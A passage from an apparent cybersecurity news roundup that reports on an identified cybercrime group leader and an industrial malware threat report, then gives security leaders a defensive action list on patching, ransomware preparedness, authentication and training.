Operating under the aliases "Stern" and "Ben," Kovalev led an organization exceeding 100 active members responsible for malware infections, data theft, and financial fraud on a global scale. This identification represents a significant intelligence victory, though the practical impact may be limited given that Kovalev likely remains in Russian territory beyond the reach of Western law enforcement.
Honeywell Industrial Threat Report Honeywell's 2025 industrial cybersecurity threat report revealed alarming trends in attacks targeting operational technology (OT) environments. The report documented a staggering 3,000% increase in Ramnit malware infections during Q4 2024 alone, along with more than 1,800 unique malware threats detected through USB device scanning at industrial facilities.
Particularly concerning is the finding that ransomware incidents are increasingly impacting OT systems indirectly through IT system disruptions. Even when malware doesn't directly target operational technology, the increasing convergence of IT and OT networks often forces complete production shutdowns when IT systems are compromised, demonstrating how traditional network boundaries have become dangerously blurred in modern industrial environments.
✅ Action List for Security Leaders
Immediate Critical Actions:
Patch Management Sprint: Review and immediately patch RMM and RDP tools, focusing specifically on ScreenConnect CVE-2025-3935, the June Android bulletin, Chrome's V8 zero-day (CVE-2025-5419), and Qualcomm's Adreno GPU drivers
Play Ransomware Assessment: Conduct tabletop exercises based on Play ransomware tactics, techniques, and procedures, and specifically check for vulnerable SimpleHelp RMM installations in your environment
Supply Chain Vendor Audit: Rigorously evaluate third-party risk management protocols, especially for RMM tools, Salesforce integrations, and any outsourcing partners handling sensitive customer data
Strategic Risk Management:
Authentication Modernization: Begin comprehensive planning to migrate away from SMS and email-based one-time password systems, following the UAE banking directive as a model for timeline and implementation
Network Segmentation Review: Assess and improve network segmentation to prevent full-service disruptions from ransomware, particularly in municipal government and healthcare environments
Insider Threat Enhancement: Strengthen insider threat detection capabilities with specific focus on monitoring for data exfiltration attempts and signs of ideological motivation, even within traditionally secure divisions
Policy & Training Development:
Regulatory Compliance Planning: Build comprehensive internal response policies that comply with evolving ransomware disclosure laws, recognizing that Australia's model may expand globally
Advanced Social Engineering Training: Implement enhanced awareness programs focusing on sophisticated phishing techniques using CAPTCHAs, IT impersonation scenarios, and attacks leveraging familiar security tools
Executive Protection Programs: Prepare leadership teams for impersonation attacks and AI voice cloning threats, especially in high-profile organizational environments
Operational Security Improvements:
Open Source Security: Lock down software supply chain dependencies and implement rigorous package integrity verification before deploying any code in production environments
Cloud Security Review: Audit vendor and cloud platform access permissions, with particular attention to healthcare, finance, and critical infrastructure sectors
Threat Intelligence Integration: Monitor security tooling for Play ransomware indicators and UNC6040 (The Com) Salesforce tactics, and adopt the unified threat actor naming conventions in intelligence feeds
Strategic Planning & Advocacy:
Workforce Assessment: Evaluate cybersecurity staffing levels and budget allocations in light of CISA workforce reduction trends and increasing threat sophistication
Children's Privacy Preparation: Review data handling practices for any youth-related data in anticipation of the strengthened COPPA (Children's Online Privacy Protection Act) rule and increased regulatory scrutiny
National Security Engagement: Advocate for clear and proactive national cyber defense strategies that include both offensive and defensive capabilities, and support expedited leadership confirmations at CISA and the White House
As cyber warfare increasingly intersects with kinetic military operations, phishing campaigns evolve to weaponize trusted security tools, and insider threats successfully breach even elite intelligence agencies, the cybersecurity landscape has never been more complex, interconnected, or critical to national and organizational security.
Stay Cyber Safe!